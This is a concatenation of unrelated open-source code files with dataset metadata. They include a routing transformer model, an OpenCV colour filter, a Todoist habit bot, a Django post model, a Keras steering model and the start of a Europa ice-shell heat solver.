bo.shape[-1])).type(dtype)\n out = scatter_mean(out, so, indices.unsqueeze(-1).expand_as(so), -2)\n return out, aux_loss\n\n# feedforward\n\nclass GELU_(nn.Module):\n def forward(self, x):\n return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n\nGELU = nn.GELU if hasattr(nn, 'GELU') else GELU_\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, mult = 4, dropout = 0., activation = None, glu = False):\n super().__init__()\n activation = default(activation, GELU)\n\n self.glu = glu\n self.w1 = nn.Linear(dim, dim * mult * (2 if glu else 1))\n self.act = activation()\n self.dropout = nn.Dropout(dropout)\n self.w2 = nn.Linear(dim * mult, dim)\n\n def forward(self, x, **kwargs):\n if not self.glu:\n x = self.w1(x)\n x = self.act(x)\n else:\n x, v = self.w1(x).chunk(2, dim=-1)\n x = self.act(x) * v\n\n x = self.dropout(x)\n x = self.w2(x)\n return x\n\n# self attention\n\nclass SelfAttention(nn.Module):\n def __init__(self, dim, depth, max_seq_len, heads, local_attn_heads, window_size, local_attn_window_size = None, causal = False, attn_dropout = 0., dropout = 0., kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, rel_pos_emb = True, num_mem_kv = 0, shared_qk = False):\n super().__init__()\n assert (dim % heads) == 0, 'hidden dimension must be divisible by number of heads'\n assert (max_seq_len % window_size) == 0, 'maximum sequence length must be divisible by the target window size'\n assert local_attn_heads <= heads, 'number of local attention heads must be less than total heads'\n assert not (receives_context and local_attn_heads > 0), 'local attention cannot be used for self attention with context'\n assert not (receives_context and causal), 'contextual attention layer cannot be causal'\n\n local_attn_window_size = default(local_attn_window_size, window_size // 2)\n context_window_size = default(context_window_size, window_size)\n\n self.shared_qk = shared_qk\n self.receives_context = receives_context\n self.heads = heads\n self.local_attn_heads = local_attn_heads\n self.global_attn_heads = heads - local_attn_heads\n\n self.window_size = window_size\n\n head_dim = dim // heads\n num_clusters = max_seq_len // window_size\n\n if self.local_attn_heads > 0:\n self.local_attn = LocalAttention(local_attn_window_size, local_attn_heads, head_dim, causal = True, dropout = attn_dropout, rel_pos_emb = rel_pos_emb, shared_qk = shared_qk)\n\n if self.global_attn_heads > 0:\n self.global_attn = KmeansAttention(num_clusters, window_size, self.global_attn_heads, head_dim, causal = causal, dropout = attn_dropout, ema_decay = kmeans_ema_decay, commitment = commitment_factor, receives_context = receives_context, num_mem_kv = num_mem_kv, shared_qk = shared_qk)\n\n self.to_q = nn.Linear(dim, dim, bias = False)\n self.to_v = nn.Linear(dim, dim, bias = False)\n self.to_out = nn.Linear(dim, dim, bias = False)\n\n if not self.shared_qk:\n self.to_k = nn.Linear(dim, dim, bias = False)\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, context = None, input_mask = None, context_mask = None, **kwargs):\n assert not (self.receives_context and context is None), 'context must be passed if self attention is set to receive context'\n b, t, e, h = *x.shape, self.heads\n head_dim = e // self.heads\n\n split_heads = lambda v: v.reshape(b, -1, h, head_dim).transpose(1, 2).contiguous()\n\n kv_input = x if not self.receives_context else context\n\n q, v = self.to_q(x), self.to_v(kv_input)\n\n if not self.shared_qk:\n k = self.to_k(kv_input)\n else:\n k = self.to_q(kv_input) if self.receives_context else q\n\n q, k, v = map(split_heads, (q, k, v))\n\n split_index_fn = partial(split_at_index, 1, self.local_attn_heads)\n (lq, q), (lk, k), (lv, v) = map(split_index_fn, (q, k, v))\n has_local, has_global = map(lambda x: x.shape[1] > 0, (lq, q))\n\n out = []\n total_loss = torch.tensor(0., requires_grad=True, **to(x))\n\n if has_local:\n local_out = self.local_attn(lq, lk, lv, input_mask = input_mask)\n out.append(local_out)\n\n if has_global:\n global_out, loss = self.global_attn(q, k, v, query_mask = input_mask, key_mask = context_mask)\n total_loss = total_loss + loss\n\n out.append(global_out)\n\n out = torch.cat(out, dim=1)\n out = out.reshape(b, h, t, -1).transpose(1, 2).reshape(b, t, -1)\n out = self.to_out(out)\n return self.dropout(out), total_loss\n\nclass RoutingTransformer(nn.Module):\n def __init__(self, dim, depth, max_seq_len, heads = 8, window_size = 64, local_attn_window_size = None, causal = False, weight_tie = False, attn_dropout = 0., ff_dropout = 0., attn_layer_dropout = 0., layer_dropout = 0., n_local_attn_heads = 0, ff_glu = False, reversible = False, ff_chunks = 1, kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, _register_kmeans_update = False, rel_pos_emb = True, pkm_layers = tuple(), pkm_num_keys = 128, num_mem_kv = 0, shared_qk = None, context_shared_qk = False):\n super().__init__()\n shared_qk = default(shared_qk, causal) # default to shared qk when causal, due to experimental results\n\n local_attn_window_size = default(local_attn_window_size, window_size // 2)\n if type(n_local_attn_heads) is not tuple:\n n_local_attn_heads = tuple([n_local_attn_heads] * depth)\n\n assert len(n_local_attn_heads) == depth, 'local attention heads tuple must have the same length as the depth'\n assert all([(local_heads <= heads) for local_heads in n_local_attn_heads]), 'number of local attn heads must be less than the maximum number of heads'\n\n layers = nn.ModuleList([])\n fn_wrapper = partial(PreNorm, dim)\n\n get_attn = lambda local_heads: SelfAttention(dim, depth, max_seq_len, heads, local_heads, window_size, causal = causal, local_attn_window_size = local_attn_window_size, attn_dropout = attn_dropout, dropout = attn_layer_dropout, kmeans_ema_decay = kmeans_ema_decay, commitment_factor = commitment_factor, rel_pos_emb = rel_pos_emb, num_mem_kv = num_mem_kv, shared_qk = shared_qk)\n get_ff = lambda: Chunk(ff_chunks, FeedForward(dim, dropout = ff_dropout, glu = ff_glu), along_dim=1)\n get_context_attn = lambda: SelfAttention(dim, depth, max_seq_len, heads, 0, window_size, local_attn_window_size = local_attn_window_size, attn_dropout = attn_dropout, dropout = attn_layer_dropout, kmeans_ema_decay = kmeans_ema_decay, commitment_factor = commitment_factor, receives_context = True, context_window_size = context_window_size, num_mem_kv = num_mem_kv, shared_qk = context_shared_qk)\n get_context_ff = lambda: Chunk(ff_chunks, FeedForward(dim, dropout = ff_dropout, glu = ff_glu), along_dim=1)\n get_pkm = lambda: PKM(dim, num_keys = pkm_num_keys)\n\n if weight_tie:\n assert len(set(n_local_attn_heads)) == 1, 'you can only weight tie if number of local attention heads for all layers is the same'\n get_attn, get_ff, get_context_attn, get_context_ff, get_pkm = map(cache_fn, (get_attn, get_ff, get_context_attn, get_context_ff, get_pkm))\n\n for ind, local_heads in zip(range(depth), n_local_attn_heads):\n layer = ind + 1\n use_ff = layer not in cast_tuple(pkm_layers)\n get_parallel_fn = get_ff if use_ff else get_pkm\n\n layers.append(nn.ModuleList([\n fn_wrapper(get_attn(local_heads)),\n fn_wrapper(get_parallel_fn())\n ]))\n\n if not receives_context:\n continue\n\n layers.append(nn.ModuleList([\n fn_wrapper(get_context_attn()),\n fn_wrapper(get_context_ff())\n ]))\n\n execute_type = ReversibleSequence if reversible else SequentialSequence\n\n attn_context_layer = ((True, False),) if receives_context else tuple()\n route_attn = ((True, False), *attn_context_layer) * depth\n route_context = ((False, False), *attn_context_layer) * depth\n\n context_route_map = {'context': route_context, 'context_mask': route_context} if receives_context else {}\n attn_route_map = {'input_mask': route_attn}\n self.layers = execute_type(layers, args_route = {**attn_route_map, **context_route_map}, layer_dropout = layer_dropout)\n\n if _register_kmeans_update:\n update_kmeans_on_backwards(self)\n\n has_local_attn = any([num > 0 for num in n_local_attn_heads])\n self.pad_to_multiple = local_attn_window_size if has_local_attn else 0\n\n def forward(self, x, **kwargs):\n x, loss = self.layers(x, **kwargs)\n return x, loss\n\nclass RoutingTransformerLM(nn.Module):\n def __init__(self, num_tokens, dim, depth, max_seq_len, heads = 8, window_size = 64, local_attn_window_size = None, causal = False, emb_dim = None, weight_tie = False, attn_dropout = 0., ff_dropout = 0., attn_layer_dropout = 0., layer_dropout = 0., ff_mult = 4, ff_activation = None, ff_glu = False, return_embeddings = False, n_local_attn_heads = 0, reversible = False, ff_chunks = 1, kmeans_ema_decay = 0.999, commitment_factor = 1e-4, receives_context = False, context_window_size = None, rel_pos_emb = True, _register_kmeans_update = True, pkm_layers = tuple(), pkm_num_keys = 128, num_mem_kv = 0, shared_qk = None, context_shared_qk = False):\n super().__init__()\n assert (max_seq_len % window_size) == 0, 'max sequence length must be divisible by the window size, to calculate number of kmeans cluster'\n emb_dim = default(emb_dim, dim)\n self.max_seq_len = max_seq_len\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.axial_pos_emb = AxialPositionalEmbedding(emb_dim, axial_shape=(max_seq_len // window_size, window_size))\n self.routing_transformer = RoutingTransformer(dim, depth, max_seq_len, heads = heads, window_size = window_size, local_attn_window_size = local_attn_window_size, causal = causal, weight_tie = weight_tie, ff_dropout = ff_dropout, attn_dropout = attn_dropout, attn_layer_dropout = attn_layer_dropout, layer_dropout = layer_dropout, n_local_attn_heads = n_local_attn_heads, ff_glu = ff_glu, reversible = reversible, ff_chunks = ff_chunks, kmeans_ema_decay = kmeans_ema_decay, receives_context = receives_context, context_window_size = context_window_size, rel_pos_emb = rel_pos_emb, pkm_layers = pkm_layers, pkm_num_keys = pkm_num_keys, num_mem_kv = num_mem_kv, shared_qk = shared_qk, context_shared_qk = context_shared_qk, _register_kmeans_update = _register_kmeans_update)\n\n if emb_dim != dim:\n self.routing_transformer = ProjectInOut(self.routing_transformer, emb_dim, dim, project_out = not return_embeddings)\n\n self.out = nn.Linear(emb_dim, num_tokens) if not return_embeddings else identity\n\n def forward(self, x, **kwargs):\n x = self.token_emb(x)\n x = x + self.axial_pos_emb(x)\n x, loss = self.routing_transformer(x, **kwargs)\n return self.out(x), loss\n","sub_path":"routing_transformer/routing_transformer.py","file_name":"routing_transformer.py","file_ext":"py","file_size_in_byte":27337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312323302","text":"\"\"\"\nUniversaly HSV range is ([0-359,0-100,0-100])\nBut in openCV HSV range is ([0-179,0-255,0-255])\nSo we need to normalize it\n1. For H we just need to divide by 2.\n Example-340 in U-HSV will be 170 in cv-HSV\n2. For S and V we need to cv-HSV value = U-HSV(%) * 2.55\n Example-55% in U-HSV will be = 55 * 2.55 = 140.25 ~ 140\n\"\"\"\n\n\n\nimport cv2\nimport numpy as np\nimport os\n\npath='/home/pranjal/Desktop/RM/RM-Coding-kids/Pranjal/OpenCV/Object_Filtering'\ncap=cv2.VideoCapture(0)\nwhile True:\n ret,frame=cap.read()\n frame=cv2.flip(frame,1)\n blur = cv2.GaussianBlur(frame,(11,11),0)\n HSV_frame =cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n\n\n#For Blue Screw driver head\n #low_blue=np.array([90,80,50]) #just making an array\n #high_blue=np.array([120,255,255])\n\n#For yellow cap\n low_orange=np.array([20,100,100]) #just making an array\n high_orange=np.array([30,255,255])\n\n mask=cv2.inRange(HSV_frame,low_orange,high_orange) #Thresholding within limits\n\n kernel = np.ones((5,5),np.uint8)\n img_erosion = cv2.erode(mask, kernel, iterations=1)\n img_dilation = cv2.dilate(img_erosion, kernel, iterations=1)\n\n\n res = cv2.bitwise_and(frame,frame,mask= img_dilation)\n#Contouring or outlining\n (cnts,_) = cv2.findContours(img_dilation.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(res,cnts,-1,(0,200,0),3)\n\n for c in cnts:\n # get the bounding rect\n x, y, w, h = cv2.boundingRect(c)\n # draw a green rectangle to visualize the bounding rect\n cv2.rectangle(res, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow('C',res)\n var=cv2.waitKey(1)\n if var == ord('q'):\n break\n \ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"Second_Years/Pranjal/OpenCV/Object_Filtering/Filter_objects_HSV.py","file_name":"Filter_objects_HSV.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382815989","text":"#Challenge 2\n#Created by: Zach Golik\n\nword1=('the')\nword2=('cat')\nword3=('sat')\nword4=('on')\nword5=('the')\nword6=('mat')\n\nprint(word1, word2, word3, word4, word5, word6)\n#Completed successfully? Yes\n#Did you have any errors? Yes, simple logic errors\n#How did you solve them? Made it simpler\n#What did yo ufind difficult? Nothing\n","sub_path":"Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"639612369","text":"import os\nimport re\nimport logging\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse\nfrom todoist.api import TodoistAPI\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef get_token():\n token = os.getenv('TODOIST_APIKEY')\n return token\n\n\ndef get_project(api):\n project = os.getenv('TODOIST_PROJECT')\n if not project:\n return None\n for p in api.state['projects']:\n if p['name'] == project:\n return p['id']\n\n\ndef is_habit(text):\n return re.search(r'\\[day\\s(\\d+)\\]', text)\n\n\ndef update_streak(item, streak):\n days = '[day {}]'.format(streak)\n text = re.sub(r'\\[day\\s(\\d+)\\]', days, item['content'])\n item.update(content=text)\n\n\ndef main():\n API_TOKEN = get_token()\n today = datetime.utcnow().replace(tzinfo=None)\n if not API_TOKEN:\n logging.error('Please set the API token in environment variable.')\n exit()\n api = TodoistAPI(API_TOKEN)\n api.sync()\n project_id = get_project(api)\n tasks = api.state['items']\n for task in tasks:\n content = task['content']\n if all([\n task['due_date_utc'],\n is_habit(content),\n not project_id or task['project_id'] == project_id\n ]):\n logger.info(\"Found task id:%s content:%s\", task['id'], content[:20])\n date_string = task['date_string'] or 'ev day'\n task_id = task['id']\n due_at = parse(task['due_date_utc'], ignoretz=True)\n days_left = due_at.date() - today.date()\n if days_left:\n habit = is_habit(content)\n streak = int(habit.group(1)) + 1\n update_streak(task, streak)\n api.notes.add(task_id, '[BOT] Streak extended. Yay!')\n else:\n update_streak(task, 0)\n task.update(date_string=date_string + ' starting tod')\n api.notes.add(task_id, '[BOT] Chain broken :(')\n api.commit()\n\nif __name__ == '__main__':\n main()\n","sub_path":"habits.py","file_name":"habits.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"17724173","text":"__author__ = 'ugrend'\nfrom apscheduler.scheduler import Scheduler\n\nclass scheduler():\n\n\n def checkCouchPotatoStatus(self):\n from movielist.core.couchpotato import CouchPotato\n cp = CouchPotato(self.settings)\n cp.checkAllStatus()\n\n def getMoviePone(self):\n from movielist.core.datamining.moviefone import moviepone\n mp = moviepone()\n mp.insertFone()\n for m in range (1,13):\n mp.insertFone(m)\n\n\n def __init__(self,settings):\n self.settings = settings\n self.sched = Scheduler()\n self.sched.start()\n self.sched\n\n\n\n\n\n\n\n","sub_path":"movielist/core/scheduler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597051910","text":"# -*- coding: utf-8 -*-\n\n# Python's Libraries\nfrom __future__ import unicode_literals\n\n# Django's Libraries\nfrom django.db import models\n\n# Third-party Libraries\nfrom django_resized import ResizedImageField\n\n# Own's Libraries\nfrom .utilities import Helper\nfrom security.models import Profile\n\n\nclass Post(models.Model):\n\n STATUS = (\n ('PUB', 'PUBLICADO'),\n ('EDT', 'Editando'),\n )\n\n title = models.CharField(\"Titulo\", max_length=120)\n image = ResizedImageField(\n \"Imagen\",\n upload_to=Helper.get_ImagePath_Post,\n quality=75,\n blank=True,\n validators=[\n Helper.validate_Img_Extension,\n Helper.validate_Size\n ]\n )\n content = models.TextField(\"Contenido\", blank=True)\n\n status = models.CharField(\n \"Estado\",\n max_length=3,\n choices=STATUS,\n default=\"EDT\"\n )\n created_by = models.ForeignKey(\n Profile,\n verbose_name=\"Creado por\",\n related_name='post_created_by',\n null=True\n )\n created_date = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated_by = models.ForeignKey(\n Profile,\n verbose_name=\"Actualizado por\",\n related_name='post_updated_by',\n null=True\n )\n updated_date = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n def __unicode__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Pubicación'\n verbose_name_plural = 'Publicaciones'\n","sub_path":"editorial/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193314604","text":"from path import Path\nimport os\n\nroot = Path('.')\nf_root = open(root / 'README.md', 'w')\nf_root.write('## Introduction' + os.linesep + os.linesep)\nf_root.close()\nf_summary = open(root / 'SUMMARY.md', 'w')\nf_summary.write('# Introduction' + os.linesep + os.linesep + '* [Introduction](README.md)' + os.linesep)\nf_summary.close()\nf_root = open(root / 'README.md', 'a')\nf_summary = open(root / 'SUMMARY.md', 'a')\nfor dir in root.dirs():\n if dir.stem != '_book' and dir.stem != '.git':\n f = open(dir / 'README.md', 'w')\n f.write('## ' + dir.stem.replace('-', ' ').upper() + os.linesep + os.linesep)\n f.close()\n f_summary.write(os.linesep + '# ' + dir.stem.replace('-', ' ').upper() + os.linesep + os.linesep)\n f_root.write('* [' + dir.stem.replace('-', ' ').upper() + ']' + '(' + dir.stem + '/README.md)' + os.linesep)\n f_summary.write('* [' + dir.stem.replace('-', ' ').upper() + ']' + '(' + dir.stem + '/README.md)' + os.linesep)\n for file in dir.files():\n print(file)\n if file.stem != 'img' and file.stem != 'README':\n f = open(dir / 'README.md', 'a')\n f.write('* [' + file.stem.replace('-', ' ') + '](' + file.basename() + ')' + os.linesep)\n f_summary.write(' * [' + file.stem.replace('-', ' ') + '](' + dir.stem + '/' + file.basename() + ')' + os.linesep)\n\nf_root.close()\nf_summary.close()\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594091847","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimport skimage.measure\nfrom skimage import io\nfrom settings import *\n\npath = './img/enemy1/sample/'\n\n\ndef Capture():\n game = game_default(False)\n \n game.init()\n tempPicture = game.get_state().screen_buffer\n \n #plt.imshow(tempPicture)\n #plt.show()\n\n game.close()\n saveImg(tempPicture)\n \n print('finish!')\ndef ORB(img):\n #Initiate ORB detector\n orb = cv.ORB_create()\n # find the keypoints with ORB\n kp = orb.detect(img,None)\n # compute the descriptors with ORB\n kp, des = orb.compute(img, kp)\n # draw only keypoints location,not size and orientation\n img2 = cv.drawKeypoints(img, kp, None, color=(0,255,0), flags=0)\n #plt.imshow(img2,cmap='gray'), plt.show()\n #plt is show bgr, you need change to rgb\n plt.axis(\"off\")\n plt.imshow(img2),plt.show()\n #plt.imshow(cv.cvtColor(img2, cv.COLOR_BGR2RGB)), plt.show()\n\ndef orb_compare():\n \n \n \n img1 = cv.imread(path+'e1_rgb.png')\n img2 = cv.imread(path+'7.jpg')\n #gray\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n \n orb = cv.ORB_create()\n\n kp1 = orb.detect(img1,None)\n kp2 = orb.detect(img2,None)\n kp1, des1 = orb.compute(img, kp1)\n kp2, des2 = orb.compute(img, kp2)\n\n bf = cv.BFMatcher(cv.NORM_HAMMING, crossCheck=True)\n matches = bf.match(des1, des2)\n matches = sorted(matches, key=lambda x: x.distance)\n img3 = cv.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=2)\n plt.imshow(cv.cvtColor(img3, cv.COLOR_BGR2RGB)), plt.show()\n\n\ndef maxPooling(X,x,Y,y,img):\n return skimage.measure.block_reduce(img,(x,y),np.max)\n\ndef akaze_compare():\n img1 = cv.imread(path+'e1_rgb.png')\n img2 = cv.imread(path+'7.jpg')\n #gray\n gray1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n akaze = cv.AKAZE_create()\n kp1, des1 = akaze.detectAndCompute(gray1, None)\n kp2, des2 = akaze.detectAndCompute(gray2, None)\n\n bf = cv.BFMatcher(cv.NORM_HAMMING, crossCheck=True)\n matches = bf.match(des1, des2)\n matches = sorted(matches, key=lambda x: x.distance)\n img3 = cv.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=2)\n plt.imshow(cv.cvtColor(img3, cv.COLOR_BGR2RGB)), plt.show()\n \ndef monster_feature():\n #img = cv.imread(path+'7.jpg')\n img = cv.imread(path+'e1_rgb.png')\n #gray\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n \n blurred = cv.GaussianBlur(gray,(17,25),0)\n canny = cv.Canny(blurred, 30 ,150)\n #orb = cv.ORB_create()\n akaze = cv.AKAZE_create()\n kp, des = akaze.detectAndCompute(blurred, None)\n # draw only keypoints location,not size and orientation\n img2 = cv.drawKeypoints(blurred, kp, None, color=(0,255,0), flags=0)\n \n result = np.hstack([gray, blurred, canny])\n plt.imshow(img2,cmap='gray'), plt.show()\n \n \n blurred = cv.GaussianBlur(gray, (15, 15), 0)\n canny = cv.Canny(blurred, 30, 150)\n\n\n result = np.hstack([gray, blurred, canny])\n plt.imshow(result,cmap='gray'), plt.show()\n\n '''\n akaze = cv.AKAZE_create()\n kp, des = akaze.detectAndCompute(gray, None)\n img2 = cv.drawKeypoints(img, kp, None, color=(0,255,0), flags=0)\n plt.imshow(cv.cvtColor(img2, cv.COLOR_BGR2RGB)), plt.show()\n '''\n\n#Capture()\n#img = cv.imread(path+'4.jpg')\n#ORB(img)\n#orb_compare()\n#akaze_compare()\nmonster_feature()\n'''\ngame = game_default()\ntempPicture = game.get_state().depth_buffer\ngame.init()\ngame.close()'''\n","sub_path":"mywork/objDetect.py","file_name":"objDetect.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303926625","text":"import gen_core\nimport json\nimport os\n\nunits = gen_core.units\n\ntools = gen_core.tools\n\nbase_directory = gen_core.base_directory\n\nfor i in units:\n with open(base_directory + i) as k:\n unit = json.load(k)\n if \"production\" in unit:\n if \"metal\" in unit[\"production\"]:\n unit[\"production\"][\"metal\"] = unit[\"production\"][\"metal\"] * 2\n if \"storage\" in unit:\n if \"metal\" in unit[\"storage\"]:\n unit[\"storage\"][\"metal\"] = unit[\"storage\"][\"metal\"] * 2\n\n if \"factory_cooldown_time\" in unit:\n unit[\"factory_cooldown_time\"] = unit[\"factory_cooldown_time\"] // 2\n\n if \"navigation\" in unit:\n if \"move_speed\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"move_speed\"] = int(unit[\"navigation\"][\"move_speed\"] * 1.5)\n if \"acceleration\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"acceleration\"] = int(unit[\"navigation\"][\"acceleration\"] * 1.5)\n if \"turn_speed\" in unit[\"navigation\"]:\n unit[\"navigation\"][\"turn_speed\"] = int(unit[\"navigation\"][\"turn_speed\"] * 1.5)\n\n\n if i[0:7] == '/pa_ex1':\n i = '/pa' + i[7:] \n\n try:\n with open('hypa' + i, 'w+') as out:\n c = 0\n except:\n os.makedirs(\"/\".join(('hypa' + i).split(\"/\")[:-1]))\n\n with open('hypa' + i, 'w+') as out:\n json.dump(unit, out)\n\nfor i in tools:\n with open(base_directory + i) as k:\n tool = json.load(k)\n\n if \"construction_demand\" in tool:\n if \"metal\" in tool[\"construction_demand\"]:\n tool[\"construction_demand\"][\"metal\"] = tool[\"construction_demand\"][\"metal\"] * 2\n\n if \"rate_of_fire\" in tool:\n tool[\"rate_of_fire\"] = tool[\"rate_of_fire\"] * 1.5\n if \"pitch_rate\" in tool:\n tool[\"pitch_rate\"] = tool[\"pitch_rate\"] * 1.5\n if \"yaw_rate\" in tool:\n tool[\"yaw_rate\"] = tool[\"yaw_rate\"] * 1.5\n\n if \"ammo_demand\" in tool:\n tool[\"ammo_demand\"] = tool[\"ammo_demand\"] * 1.5 \n\n\n if i[0:7] == '/pa_ex1':\n i = '/pa' + i[7:] \n\n try:\n with open('hypa' + i, 'w+') as out:\n c = 0\n except:\n os.makedirs(\"/\".join(('hypa' + i).split(\"/\")[:-1]))\n\n with open('hypa' + i, 'w+') as out:\n json.dump(tool, out)","sub_path":"gen_hypa.1.py","file_name":"gen_hypa.1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26546084","text":"import pandas as pd\nimport numpy as np\nfrom scipy.misc import imread\nfrom keras.layers import Flatten, Dense, Activation, Convolution2D, normalization\nfrom keras.models import Sequential\nimport matplotlib.pyplot as plt\nimport cv2\nfrom sklearn.model_selection import train_test_split\nfrom keras.optimizers import Adam\n\ndef extract_and_transform(df, col, pos):\n #Find and bring in the center picture from its residing folder\n im = imread(df[col][pos].strip())\n #Crop the image to get rid of the trees and landscape\n im = im[60:,:]\n #Resize the image\n im = cv2.resize(im, (200, 66))\n return im\n\ndef normalize(img_batch):\n #Normalize the extracted images\n norm = (np.array(img_batch)/127.5) - 1\n #Convert the image to a floating point number\n return norm.astype(np.float32)\n\ndef load_bottleneck_data(driving_log):\n file = driving_log #driving_log.csv\n #Name all the columns in the dataframe\n cols = ['Center_Image','Left_Image','Right_Image','Steering_Angle','Throttle','Break','Speed']\n df = pd.read_csv(file, names = cols)\n \n #Store all the center images\n X = []\n for i in range(len(df)):\n transformed = extract_and_transform(df, cols[0], i)\n X.append(transformed)\n \n X = normalize(X)\n #Convert the steering angles to a list and set them to y\n y = df[cols[3]].tolist()\n \n #Split the data into testing and training data\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=0)\n\n return X_train, X_test, y_train, y_test\n\n\n# load bottleneck data\nX_train, X_test, y_train, y_test = load_bottleneck_data('C:/Users/asyed/Downloads/driving_log.csv')\n\n#Reshape all the data for the model architecture\nX_train = np.reshape(X_train, (len(X_train), 66, 200, 3))\nX_test = np.reshape(X_test, (len(X_test), 66, 200, 3))\ny_train = np.reshape(y_train, (len(y_train), 1))\ny_test = np.reshape(y_test, (len(y_test), 1))\n\ninput_shape = X_train.shape[1:]\n#the output is a steering angle (i.e. 1 class)\nnb_classes = 1\n\n\nmodel = Sequential()\nmodel.add(normalization.BatchNormalization())\nmodel.add(Convolution2D(24, 5, 5, subsample=(2,2), border_mode='valid', activation='relu', input_shape=input_shape))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2,2), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2,2), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='valid', activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, subsample=(1,1), border_mode='valid', activation='relu'))\nmodel.add(Flatten())\n\n#model.add(Dropout(0.25))\nmodel.add(Dense(1164))\nmodel.add(Activation('relu'))\nmodel.add(Dense(100))\nmodel.add(Activation('relu'))\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(10))\nmodel.add(Activation('relu'))\n#model.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.summary()\nmodel.compile(loss='mse', optimizer=Adam(), metrics=['mean_squared_error'])\n#model.fit(X_train, y_train, nb_epoch=3, batch_size=10, validation_data=(X_test, y_test), shuffle=True)\nhistory = model.fit_generator((X_train, y_train), \n samples_per_epoch=100,\n nb_epoch=3,\n validation_data=(X_test, y_test),\n verbose=1) \n#Output the JSON and H5 file for trying in the driving program provided\nmodel_json = model.to_json()\nwith open(\"C:/Users/asyed/Downloads/model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(\"C:/Users/asyed/Downloads/model.h5\")\nprint(\"Saved model to disk\")","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"132954785","text":"# Author: Chase Chivers\n# Last updated: 10/28/19\n# Modular build for 2d heat diffusion problem\n# applied to liquid water in the ice shell of Europa\n\nimport numpy as np\nfrom scipy import optimize\nfrom HeatSolver import HeatSolver\n\nclass IceSystem(HeatSolver):\n\t\"\"\"\n\tClass with methods to set up initial conditions for two-dimensional, two-phase thermal diffusion model that\n\tincludes temperature-dependent conductivity and salinity. Includes the HeatSolver class used to solve the heat\n\tequation utilizing an enthalpy method (Huber et al., 2008) to account for latent heat from phase change as well\n\tas a parameterization for a saline system.\n\t\"\"\"\n\tdef __init__(self, Lx, Lz, dx, dz, kT=True, cpT=False, use_X_symmetry=False):\n\t\t\"\"\"\n\t\tInitialize the system.\n\t\tParameters:\n\t\t\tLx : float\n\t\t\t\tlength of horizontal spatial domain, m\n\t\t\tLz : float\n\t\t\t\tthickness of shell, length of vertical spatial domain, m\n\t\t\tdx : float\n\t\t\t\thorizontal spatial step size, m\n\t\t\tdz : float\n\t\t\t\tvertical spatial step size, m\n\t\t\tcpT : bool\n\t\t\t choose whether to use temperature-depedent specific heat,\n\t\t\t default = False.\n\t\t\t True: temperature-dependent, cp_i ~ 185 + 7*T (Hesse et al., 2019)\n\t\t\tkT : bool\n\t\t\t choose whether to use temperature-dependent thermal conductivity,\n\t\t\t default = True, temperature-dependent, k=ac/T (Petrenko, Klinger, etc.)\n\t\t\tuse_X_symmetry : bool\n\t\t\t\tassume the system is symmetric about the center of the intrusion\n\t\t\t\t* 